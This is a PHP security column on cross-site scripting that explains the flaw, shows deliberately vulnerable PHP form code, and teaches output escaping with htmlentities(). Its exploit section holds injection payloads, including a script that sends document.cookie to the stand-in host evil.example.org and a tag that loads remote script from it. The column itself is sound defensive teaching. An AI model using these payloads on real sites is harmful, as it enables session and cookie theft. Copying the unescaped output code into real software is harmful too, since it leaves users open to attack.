Cross-Site Scripting

Published in PHP Architect on 21 Nov 2005

Cross-site scripting (XSS) is a poor description for a vulnerability, because the name refers to an old exploit. This is a common problem within the security community. A vulnerability is not known until someone discovers an exploit for it, so this is hardly surprising. The exploit gets named, and then all exploits that target the same vulnerability inherit the name.

The original XSS exploit involved the use of frames, a feature rarely used today. By using a frameset, one was able to include content from other domains (sites), and JavaScript within one frame was able to cross web site boundaries to access content from another frame.

The most common XSS exploits today don't necessarily do anything to cross sites, and this continues to be a cause of some confusion. Even some security experts have been known to shun the XSS label when an attack only involves a single site.

The Vulnerability

XSS exists when tainted data is allowed to enter the context of HTML without being properly escaped. Stated differently, when your PHP code outputs data that has neither been filtered nor escaped, it is definitely vulnerable to XSS. This is an easy mistake to make, and the following example demonstrates the vulnerability:

  <?php

  echo $_POST['username'];

  ?>

Although this is an extreme example, it is hopefully clear that $_POST['username'] is just one (albeit obvious) example of tainted data. Sometimes, especially without a solid design, it is difficult to determine whether the data in a particular variable is tainted.

Some describe XSS as an input filtering problem, but this isn't entirely accurate. It's easy to see how people reach this conclusion, however. Consider the use of input filtering as protection:

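  <?php

  $clean = array();

  // Accept the username only if it is present and purely alphanumeric.
  if (isset($_POST['username']) && ctype_alnum($_POST['username'])) {
      $clean['username'] = $_POST['username'];
  }

  // Greet the user only when a filtered value exists.
  if (isset($clean['username'])) {
      echo "<p>Welcome, {$clean['username']}.</p>";
  }

  ?>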

If the username is guaranteed to be alphanumeric, then it is safe to be used in the context of HTML. However, this technique addresses the symptom rather than the root cause of the problem. It's not always possible to eliminate XSS vulnerabilities with filtering alone. Sometimes, input filtering rules must be very relaxed to accommodate all valid data, and therefore not all valid data can be safely used in the context of HTML.
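
To make that limitation concrete, here is a minimal sketch that assumes a free-form comment field in which any printable ASCII text of up to 200 bytes is valid. The helper name is_valid_comment() and its rules are hypothetical, chosen only for illustration. The comment passes the filter, yet it still contains characters that have special meaning in HTML:

```php
<?php

// Hypothetical relaxed filter for a free-form comment field: any
// printable ASCII text up to 200 bytes is valid, including < and >.
function is_valid_comment($comment)
{
    return is_string($comment)
        && strlen($comment) <= 200
        && preg_match('/^[\x20-\x7E]+$/', $comment) === 1;
}

$clean = array();
$input = 'Use <b> rather than <font> for bold text.';

if (is_valid_comment($input)) {
    $clean['comment'] = $input;
}

// The data passed the filter...
var_dump(isset($clean['comment']));                        // bool(true)

// ...but it still contains HTML metacharacters.
var_dump(strpbrk($clean['comment'], '<>&"\'') !== false);  // bool(true)
```

Tightening the filter until it rejects this comment would also reject perfectly legitimate input, which is why filtering alone cannot be the answer.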

The real solution to the XSS problem requires developers to understand context. In PHP, we can safely store any data in a variable — even binary data. Once that data enters another context, such as HTML, it is important to ensure that it is treated only as data.

Understanding context is a topic worthy of its own column. Stay tuned.

The Exploits

The number of possible XSS exploits is effectively unlimited, because the only limitations are those that naturally exist on the client side (and client-side scripting is becoming more and more powerful as browsers advance). I am often disappointed by the number of developers who do not appreciate the dangers that XSS presents. However, I do understand why many have doubts: example exploits are often benign, because security experts don't want to provide dangerous exploits for fear that they will be misused. One of the most common examples is to attempt to open an alert box:

  <script>alert('XSS')</script>

This is hardly a reason to worry, but it effectively identifies a vulnerability. Once a vulnerability is discovered, the possibilities are endless.
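
The same probe can be used to test your own pages without a browser. The following is a hypothetical check rather than an established tool: reflects_probe() is an assumed helper name, and the two strings stand in for the responses of a vulnerable script and a safe one. If the probe comes back verbatim, the output was not escaped:

```php
<?php

// Hypothetical helper: true if the probe appears verbatim in the
// response body, meaning the page did not escape it.
function reflects_probe($body, $probe)
{
    return strpos($body, $probe) !== false;
}

$probe = "<script>alert('XSS')</script>";

// Stand-ins for two responses to a request that carried the probe.
$vulnerable = "<p>Welcome, $probe.</p>";
$escaped    = '<p>Welcome, ' . htmlentities($probe, ENT_QUOTES, 'UTF-8') . '.</p>';

var_dump(reflects_probe($vulnerable, $probe)); // bool(true)
var_dump(reflects_probe($escaped, $probe));    // bool(false)
```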

There are many variants of this benign attack, and some try to guess the specific context in which the data is used. For example, consider a form that repopulates itself whenever there is an error:

  <p>There was an error processing the form.
  Please try again.</p>

  <form action="process.php" method="post">
  <p>Name:
  <input type="text"
         name="name"
         value="<?php echo $_POST['name']; ?>" /></p>
  <p>Location:
  <input type="text"
         name="location"
         value="<?php echo $_POST['location']; ?>" /></p>

  <p><input type="submit"></p>
  </form>

Because this approach is so popular, another simple XSS test has emerged:

  "><script>alert('XSS')</script><"

If provided as the name in the previous example, the form element is redisplayed as follows:

  <p>Name:
  <input type="text"
         name="name"
         value=""><script>alert('XSS')</script><"" /></p>

By correctly guessing the context of the data (it is the value attribute of the form element), an attacker can successfully exploit the form.

Traditionally, malicious XSS exploits have been used to steal cookies, because document.cookie can be read and subsequently sent to a remote site using a variety of methods. For example, one such attack uses injected JavaScript to make the victim's browser request an image from the attacker's site, with the cookies included in the URL. This is the same forged-request technique that underlies cross-site request forgery (CSRF):

  <script>
  new Image().src =
      'http://evil.example.org/steal.php?cookies=' +
      encodeURI(document.cookie);
  </script>

If this JavaScript is present in a page on your web site (a possibility that XSS vulnerabilities yield), document.cookie contains cookies associated with your site, and the victim's browser sends a request to evil.example.org that includes these cookies. Then, steal.php uses $_GET['cookies'] to access them.

When an attack is too long (perhaps the application truncates the data), attackers can try to reference the malicious code instead, relying on the browser to fetch it:

  <script src="http://evil.example.org/evil.js"></script>

There are numerous other examples and test cases provided in the XSS Cheatsheet.

Emerging attacks are beginning to make use of new advances in client-side scripting, notably Ajax techniques. The most famous of these new attacks is the Myspace worm that infected more than a million accounts before being stopped. Although the viral nature of the worm was the result of a CSRF attack, it was XSS that provided the initial opening and made the worm possible.

What makes the Myspace worm particularly frightening is that the use of XMLHttpRequest() provides a way around the traditional CSRF protection of using a token in a form.

As the number of people well-versed in client-side technologies continues to increase, we are sure to see more and more creative XSS attacks emerge.

The Safeguards

You should always filter input, but protecting against XSS requires addressing the root cause of the problem — in the context of HTML, anything you want to be considered data needs to be escaped to ensure that it is so. For example, given $name and $location, the following demonstrates how this data can enter a new context:

  <?php

  echo "<p>$name is from $location</p>";

  ?>

You might be wondering why PHP can't escape these values automatically for you. The reason is that it can't predict your intentions. After all, you might have HTML tags within $name and $location that you intend to be interpreted by the browser:

  <?php

  $name = "<em>$first_name $last_name</em>";
  $location = "<em>$city, $state</em>";

  ?>

Only you can really know what you expect to be data (and nothing but data). Whatever your approach, you need to remember to escape the data that you want to preserve. In the previous example, $first_name, $last_name, $city, and $state are data, but the HTML emphasis tags that surround them are not. Therefore, each of these four variables should be escaped before it is placed between the tags.
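
As a minimal sketch of that rule, the following escapes each piece of data with htmlentities() (the function discussed later in this column) and only then wraps it in the intended markup. The sample values are assumptions made up for the illustration; the last name deliberately contains tags that should be displayed rather than interpreted:

```php
<?php

// Sample values standing in for tainted data (assumed for this sketch).
$first_name = 'Jane';
$last_name  = '<b>Doe</b>';
$city       = 'New York';
$state      = 'NY';

// Escape every piece of data before it enters the context of HTML.
$html = array();
$html['first_name'] = htmlentities($first_name, ENT_QUOTES, 'UTF-8');
$html['last_name']  = htmlentities($last_name, ENT_QUOTES, 'UTF-8');
$html['city']       = htmlentities($city, ENT_QUOTES, 'UTF-8');
$html['state']      = htmlentities($state, ENT_QUOTES, 'UTF-8');

// The <em> tags are markup you intend; everything inside them is data.
$name     = "<em>{$html['first_name']} {$html['last_name']}</em>";
$location = "<em>{$html['city']}, {$html['state']}</em>";

echo "<p>$name is from $location</p>\n";
// <p><em>Jane &lt;b&gt;Doe&lt;/b&gt;</em> is from <em>New York, NY</em></p>
```

The browser still interprets the emphasis tags, but the tags inside the last name are shown to the user as literal text.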

Escaping is a technique intended to preserve data in a new context. When data leaves your application, it enters a new context, and this is why I frequently simplify this rule to "escape output."

Because this month's topic is XSS, the context in question is HTML, and there is a simple function to escape data you want to preserve in the context of HTML:

  <?php

  $html = array();

  $html['data'] = htmlentities($data, ENT_QUOTES, 'UTF-8');

  ?>
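
Applied to the self-repopulating form shown earlier, the sketch below escapes the submitted name before placing it in the value attribute. The helper render_name_field() is hypothetical and exists only for this illustration; the payload is the test string from the previous section:

```php
<?php

// Hypothetical helper: builds the name field with its value escaped
// for use inside a double-quoted HTML attribute.
function render_name_field($value)
{
    $escaped = htmlentities($value, ENT_QUOTES, 'UTF-8');

    return '<input type="text" name="name" value="' . $escaped . '" />';
}

$payload = '"><script>alert(\'XSS\')</script><"';

echo render_name_field($payload), "\n";
// <input type="text" name="name" value="&quot;&gt;&lt;script&gt;alert(&#039;XSS&#039;)&lt;/script&gt;&lt;&quot;" />
```

Because ENT_QUOTES converts both single and double quotes, the payload can no longer close the attribute, and the browser displays it in the text field exactly as it was typed.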

Naming conventions (like the use of $html demonstrated here) can help you keep track of data that can be safely used in another context:

  <?php

  $html = array();

  $html['username'] = htmlentities($clean['username'], ENT_QUOTES, 'UTF-8');

  echo "<p>Welcome, {$html['username']}.</p>";

  ?>
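
One way to make the convention harder to forget is to escape all filtered data in a single step. The helper below, escape_for_html(), is a hypothetical name, and the sketch assumes every value in $clean is a string; the sample values are made up for the illustration:

```php
<?php

// Hypothetical helper: escapes every value in an array of filtered
// data for use in HTML, so that output code only ever reads from $html.
// Assumes all values are strings.
function escape_for_html(array $clean)
{
    $html = array();

    foreach ($clean as $key => $value) {
        $html[$key] = htmlentities($value, ENT_QUOTES, 'UTF-8');
    }

    return $html;
}

// Sample filtered data (assumed for this sketch).
$clean = array(
    'username' => 'alice',
    'bio'      => 'I <3 PHP & "quotes"',
);

$html = escape_for_html($clean);

echo "<p>Welcome, {$html['username']}.</p>\n";
// <p>Welcome, alice.</p>
echo "<p>{$html['bio']}</p>\n";
// <p>I &lt;3 PHP &amp; &quot;quotes&quot;</p>
```

With this approach, any variable other than $html that appears in an echo statement stands out as a likely mistake during code review.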

Resist the temptation to consider input filtering to be the solution to XSS. As I mentioned previously, your input filtering rules might need to be so relaxed that they cannot offer adequate protection. Filtering your input helps ensure data integrity and can increase the reliability and predictability of your applications (all good things), but it does not address the root cause of XSS. I strongly recommend adhering to both practices (filter input and escape output), because input filtering offers strong protection against many other types of security vulnerabilities. With respect to XSS, it can also be considered a defense-in-depth mechanism.

Until Next Time...

I hope this article helps you appreciate the danger that XSS presents as well as the importance and purpose of escaping. Protecting your applications from XSS attacks requires a few very simple steps, notably escaping your output and using a naming convention (or similar approach) that can help you reliably distinguish between escaped and unescaped data.

Until next month, be safe.